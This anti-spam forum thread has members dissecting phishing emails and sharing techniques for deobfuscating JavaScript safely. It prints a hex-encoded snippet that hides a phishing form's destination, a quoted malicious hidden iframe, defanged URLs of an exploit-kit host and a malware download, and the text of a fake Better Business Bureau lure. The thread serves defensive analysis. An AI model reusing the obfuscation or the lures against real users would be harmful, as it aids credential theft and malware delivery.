What's this phish doing?

ahoier · **Posted:** Thu May 27, 2010 6:52 pm

Just what is this trying to do?

I searched through this code source 3 times and am not seeing what exactly they are trying to do; or if perhaps they "lost" the payload when they scripted it out? lol.....I mean, ain't like it hasn't happened before ;) In the Sloppy Criminals forum lol....

See pastebin at http://pastebay.com/100835 with plain text of "attachment source" within the following message:
http://www.spamcop.net/sc?id=z407525236 ... a1514993fz

I reported to Spamcop anyhow, since the message was originating from
Re: 213.25.179.100 (Administrator of network where email originates)

[email protected]

But just curious if anyone can see the payload? I found loads of bankofamerica "sitekey" hotlinks, but nothing pointing to a "hijacked" host of any sort....unless like I said, either
1) I overlooked it, or
2) they just forgot to include the payload for the "Continue" button....

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

The key is on line #148. It's a typical JavaScript obfuscation to hide the true location of where this form is going to post. Here's the output of that code:

Code:

<form action="http://www.pharmaquest.es/verify.php" method="post" name="frm" id="frm" onsubmit="return validate(this)">

If you visit that page without posting it, it does indeed redirect you to Chase Bank, which is what they're trying to allege they are. Visiting pharmaquest.es on its own shows the same parked page shown for many illicit sites including many rogue affiliate groups.

While trying to locate who set up hosting and domain registration, DNSSTUFF told me: Spain doesn't have a WHOIS server. Huh. News to me. Must be why they chose it.

Won't ping, won't whois. I have no info on this server, but now you know which domain to report.

SiL

AlphaCentauri · **Joined:** Thu Mar 01, 2007 3:01 am **Posts:** 5915

spamislame wrote:

While trying to locate who set up hosting and domain registration, DNSSTUFF told me: Spain doesn't have a WHOIS server. Huh. News to me. Must be why they chose it.

I found this one a while back:
http://www.esreg.com/whois.php

Quote:

Whois info for pharmaquest.es
Registration data

Domain: pharmaquest.es

Reg. date: 2009-01-23
Exp. date: 2011-01-23

Owner: Juan Carlos Gil Sanchez
Admin contact: wedge JCGS80-ESNIC-F4

Name: Juan Carlos Gil Sanchez
Organization:
Email: jcarlosgs@vodafone.es
Telephone:
Address:
City:
Province:
Postal Code:
Country:
Tech contact: wedge RIS78-ESNIC-F4

Name: RAN INTERNET S.L.
Organization:
Email: registros-es@ran.es
Telephone:
Address:
City:
Province:
Postal Code:
Country:
Billing contact: wedge

Information unavailable

Nameserver 1: ns2.ran.es
Nameserver 2: wintermute.ran.es

Registrar: Estrategias WebSite S.L.

From DNSstuff's point of view, they don't have a whois server. It's meant to be human-only. The CAPTCHA is brutal (full of O's and U's with no indication of whether they're supposed to be upper or lower case), and you have to click on tiny arrows to expand all the fields.

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

> whois pharmaquest.es

Quote:

This TLD has no whois server, but you can access the whois database at
https://www.nic.es/ingles/

Invalid security certificate:

Quote:

Technical details

http://www.nic.es uses an invalid security certificate.

The certificate is not trusted because the issuer certificate is not trusted.

(Error code: sec_error_untrusted_issuer)

Quote:

I Understand the Risks

If you understand what's going on, you
can tell Firefox to start trusting this site's identification.
Even if you trust the site, this error could mean that someone is
tampering with your connection.

Don't add an exception unless
you know there's a good reason why this site doesn't use trusted identification.

[Add Exception]
[Confirm security exception]

Now reload the site at https://www.nic.es/ingles/ but you end up at
https://www.nic.es/error.action?status=404

Dropping the /ingles, reload just https://www.nic.es/ and you end up at
https://www.nic.es/index.action

Click on [Welcome] because it's in English, and end up at the English page
https://www.nic.es/index.action?request_locale=en

At the Search box, key pharmaquest and click [Buscar]
Key the CAPTCHA and view the details. - as AC reported

Quote:

PERSONA DE CONTACTO ADMINISTRATIVO
>
Identificador JCGS80-ESNIC-F4
Nombre Juan Carlos Gil Sanchez
Email [email protected]

PERSONA DE CONTACTO TECNICO
>
Identificador RIS78-ESNIC-F4
Nombre RAN INTERNET S.L.
Email [email protected]

ahoier · **Posted:** Mon May 31, 2010 12:43 pm

Interesting, that's gotta be the first *.es domain I've seen I think.......not counting the typical "hijacked" redirection domains most commonly used by "phishers"...

How did you get that js decoded? Malzilla? Is there any "standalone" web-friendly way of decrypting it, without installing a "program" :)

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

ahoier wrote:

Interesting, that's gotta be the first *.es domain I've seen I think.......not counting the typical "hijacked" redirection domains most commonly used by "phishers"...

Agreed.

ahoier wrote:

How did you get that js decoded? Malzilla? Is there any "standalone" web-friendly way of decrypting it, without installing a "program"

I write tons of JavaScript, so I modified it so it would output what it was doing in a way that wouldn't be interpreted by the browser. Often faster for me to do it that way. Malzilla never decodes that stuff. The particular method they used here is extremely commonplace.

Original line 148 (wrapped for legibility):

Code:

var i,y,x="3c666f726d20616374696f6e3d22687474703a2f2f7777772e706
861726d6171756573742e65732f7665726966792e70687022206d6574686
f643d22706f737422206e616d653d2266726d222069643d2266726d22206
f6e7375626d69743d2272657475726e2076616c696461746528746869732
9223e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.subst
r(i,2));}document.write(y);

Note that they just "document.write" that value once it's been de-obfuscated.

I instead go:

Code:

document.write("<textarea rows=10 cols=80>"+y+"</textarea>");

And that outputs it in a textarea.

SiL

trobbins · **Joined:** Thu Apr 12, 2007 6:55 pm **Posts:** 2549

Taken from http://isc.sans.org/diary.html?storyid=2358

Quote:

Beware of </textarea>

Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>

What does this do? It closes the <textarea> tag that you might have put before. In other words, if you were running this in your browser and you used method 2) you would actually execute the malicious code! It is obvious that author of this code came prepared for analysts!

Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.

Defeating the obfuscation

One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/bl ... ?BlogID=98, it’s a nice read that I definitely recommend.

I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just must make sure that you have JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:

D:> java –classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js

This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this as that will allow you to set breakpoints easier – and as we’ve seen, in this case you can do it as the deobfuscation function will strip out white spaces.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:

See website for screen shot.....

Quote:

You can see that it contains the code that would have been executed in the browser.

As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.

UPDATE

Couple of updates with good stuff we've received from our readers:

1) Peter wrote to correct me regarding the Tom Liston's textarea method. This method actually also modifies the function (by adding <textarea> and </textarea> tags before and after the document.write() function call) so it will also fail because of the endless while() loop. This is not directly related to thing that they close the <textarea> tag, but see 2).

2) Aaron sent us a nice function he uses to deobfuscate stuff. Basically, he replaces the document.write() call with a function he defines, called documentwrite. The function looks like this:

function documentwrite(txt){
txt0=txt.replace("textarea","apple")
if(txt == txt0){
document.write("<textarea rows=50 cols=50>");
document.write(txt0);
document.write("</textarea>");
}
else{
txt1=txt.replace("textarea","apple")
documentwrite(txt1)
}
}

So he makes sure that the output will go in a textarea, even if there are nested </textarea> flags. In this case this might even work since the . from document.write() is removed anyway, so this will pass the self checking test this malware implements.

3) An anonymous reader wrote to tell that there might be some dependencies/problems with running Rhino on Linux, due to its Java implementation. Also, on Linux, the classpath parameter is called with "--classpath".

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

This is definitely a good warning, and makes it clear I miss a key piece, but I often am explaining this to people who generally are not aware of how to decrypt whatever the criminal is trying to do.

trobbins wrote:

Taken from http://isc.sans.org/diary.html?storyid=2358

Quote:

Beware of </textarea>

<snip>

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>

That would certainly be dangerous if I was taking that approach while trying to load that entire page. I never do that. I only ever look for the pieces which perform the obfuscation and load it into its own blank html file with my own JavaScript. The only code it executes is the one I put in place. It's a method I've been using for four years now, and it's peen pretty useful. In fact I also have an ongoing log I keep every year (nerd) which tabulates most of the obfuscation techniques I see over time. They're all timestamped and completely commented out. This is so I can compare and contrast the changes in how they perform this obfuscation.

But also, fyi, in most of the cases I've seen that defense mechanism they're putting in there won't work either if the "textarea" tag is part of the encryption. It outputs the text itself as "escaped" html. It will still appear within my textarea.

e.g.:

Code:

document.write(document.write('<textarea rows=20 cols=60>'+String.fromCharCode(60,13,47,116,101,120,116,97,114,101,97,62)+'</textarea>');

That will work if you paste it inside some <script> tags. By that I mean it will still output the values within the textarea. You will see the html code they're trying to execute. But the script still has to interpret it, not execute it. I never use "eval", I use "document.write".

That's still good advice but I'd go a step further: Don't ever perform these steps from within the same full page which featured it. I think you'd have to be pretty insane to ever do that if you're a serious researcher of this stuff.

Thanks for posting that. That's definitely a very good warning. This is not for everyone. Also: there are other ways of exposing this code besides textarea tags.

SiL

Benzyl · **Posted:** Thu Mar 24, 2011 5:36 pm

I got one today that purported to be from a German lawyer who wanted an out of court settlement for a load of MP3's I'd downloaded, the email included a range of obviously bogus details (including the infringing IP address) in German and directed me to the payment site. http://www.rechtsanwalt-olaf-kaltbrenne ... 502384.ru/ I have no idea where it went or is hosted as that URL looks inconclusively meaningful to me and this sort of thing is usually derivable.

AlphaCentauri · **Joined:** Thu Mar 01, 2007 3:01 am **Posts:** 5915

I'm seeing other people report that:
http://isc.sans.edu/diary.html?storyid=8497

Since there are real firms that have a niche business strongarming people that way, it's not a surprise that it's hard for people to know which are real.

Benzyl · **Posted:** Fri Dec 09, 2011 2:04 pm

Got sent this one today as a financial PHISH from 'your bank' - httq://wonderfulwrench.com/main.php?pag ... ca118fcb8c . I don't know what it was trying to do as it crashed every browser apart from Safari that I tried and in that it promoted a frantic rustling from the hard drive and no other clues.

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

wonderfulwrench.com is a newly registered domain which has already been suspended (status: clientHold) by its registar ENOM, INC

According to a web search, the domain had been hosted at IP 46.45.137.205 on Safya Net in Turkey where the malicious web pages are still running. Using an anonymous web proxy with high levels of protections, when I view
hXXp://46.45.137.205/main.php?page=977334ca118fcb8c
I see
"Please wait page is loading..."
Additionally,
hXXp://46.45.137.205/w.php?f=52&e=2
pushes a malicious file about.exe
See:
http://www.virustotal.com/file-scan/report.html?id=68d22675c6c9b8c9fd43781f5ad0ab9f34778174ee12eb22dc1bfc1935c34496-1323461551

meep · **Joined:** Thu Apr 05, 2007 4:10 pm **Posts:** 2777

That IP, 46.45.137.205, doesn't ping for me or pull up content. Maybe offline? - Because of a Spamhaus SBL on the /24? - Hmm,

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL123560

Code:

Ref: SBL123560
46.45.137.0/24 is listed on the Spamhaus Block List (SBL)

09-Dec-2011 16:09 GMT | SR04
Cybercriminal spammer hosting

Update Dec 09, 2011

Blackhole exploit kit hosted here:
hXXp://wonderfulwrench.com/main.php?page=111d937ec38dd17e

$ dig +short wonderfulwrench.com
46.45.137.205
_____________

46.45.137.206/32
Live rh.com.tr SR29
2011-12-08 16:55:14
SBL123508 Blackhole exploit kit @46.45.137.206

_______________________
http://sucabikes.com.ar/bcab6a/index.html
>>> http://combijump.com/main.php?page=111d937ec38dd17e

_______________________

Domain Name: COMBIJUMP.COM
Registrar: 0101 INTERNET, INC.
Whois Server: whois.0101domain.com
Referral URL: http://www.0101domain.com
Name Server: 0101DOMAIN1.EARTH.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.MARS.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.MERCURY.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.VENUS.ORDERBOX-DNS.COM
Status: clientTransferProhibited
Updated Date: 07-dec-2011
Creation Date: 04-dec-2011
Expiration Date: 04-dec-2012

Registration Service Provided By: 0101DOMAIN
Contact: +852.29180101

Domain Name: COMBIJUMP.COM

Registrant:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Creation Date: 04-Dec-2011
Expiration Date: 04-Dec-2012

Domain servers in listed order:
0101domain1.earth.orderbox-dns.com
0101domain1.mars.orderbox-dns.com
0101domain1.mercury.orderbox-dns.com
0101domain1.venus.orderbox-dns.com

Administrative Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Technical Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Billing Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Status:LOCKED

_______

Received: from client178-64.wireless.umu.se ([130.239.178.64]:4150)
byxxxxx; Thu, 08 Dec 2011 08:41:28 +0000
Received: from apache by bbb.org with local (Exim 4.63)
(envelope-from <[email protected]>)
id QIWCQO-US4KQD-NK
for xxxxx; Thu, 8 Dec 2011 09:41:27 +0100
To: xxxxxxxx
Subject: Complaint from your customers
Date: Thu, 8 Dec 2011 09:41:27 +0100
From: "::Better Business Bureau::" <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------01070900204060702040305"

Attn: Owner/Manager
The Better Business Bureau has got the above mentioned complaint from one of your clients concerning their dealings with you.
The detailed information about the consumer's concern is included in attached file.
Please give attention to this problem and let us know about your standpoint.
We kindly ask you to click here to answer this complaint.

We look forward to your prompt attention to this matter.

Sincerely yours,
Louis Gerald
Better Business Bureau

Council of Better Business Bureaus
4200 Wilson Blvd, Suite 800
Arlington, VA 22203-1838
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

Confirming

Domain Name: WONDERFULWRENCH.COM
Registrar: ENOM, INC.
Status: clientHold
Status: clientTransferProhibited
Updated Date: 09-dec-2011
Creation Date: 05-dec-2011

efa · **Joined:** Wed May 02, 2007 8:59 pm **Posts:** 1055

another quiz more difficult: what this phish doing?

http://www.spamcop.net/sc?id=z522915344 ... on=display

I saw only links to the real poste.it bank web site, the little script inside seems do not redirect anywhere, and no POST tag are there.
So what?

InBoxRevenge KS Forum

What's this phish doing?

Who is online